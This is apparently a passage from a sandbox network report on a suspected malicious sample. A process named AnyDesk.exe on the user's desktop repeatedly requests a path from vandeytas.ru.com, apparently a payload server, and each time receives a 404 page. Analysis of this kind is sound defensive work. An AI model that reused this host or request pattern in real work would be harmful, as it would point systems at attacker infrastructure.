          2024-11-26 07:12:40 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          42192.168.2.64998650.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:41 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:42 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:42 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:42 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          43192.168.2.64999350.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:43 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:44 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:44 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:44 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          44192.168.2.65000050.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:46 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:46 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:46 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:46 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          45192.168.2.65000750.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:48 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:48 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:48 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:48 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          46192.168.2.65001450.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:50 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:50 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:50 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:50 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          47192.168.2.65002050.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:52 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:52 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:52 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:52 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          48192.168.2.65002750.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:54 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:54 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:54 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:54 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          49192.168.2.65003350.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:56 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:57 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:56 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:57 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          50192.168.2.65004050.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:12:58 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:12:59 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:12:59 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:12:59 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          51192.168.2.65004750.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:13:00 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:13:01 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:13:01 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:13:01 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          52192.168.2.65005450.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:13:03 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:13:03 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:13:03 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:13:03 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          53192.168.2.65006150.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:13:05 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:13:05 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:13:05 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:13:05 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          54192.168.2.65006550.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:13:07 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:13:07 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:13:07 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
          2024-11-26 07:13:07 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          55192.168.2.65007250.7.187.2184436084C:\Users\user\Desktop\AnyDesk.exe
          TimestampBytes transferredDirectionData
          2024-11-26 07:13:09 UTC165OUTGET /233_Hlvzmhuinff HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: vandeytas.ru.com
          2024-11-26 07:13:10 UTC164INHTTP/1.1 404 Not Found
          Date: Tue, 26 Nov 2024 07:13:09 GMT
          Server: Apache
          Content-Length: 315
          Connection: close
          Content-Type: text/html; charset=iso-8859-1
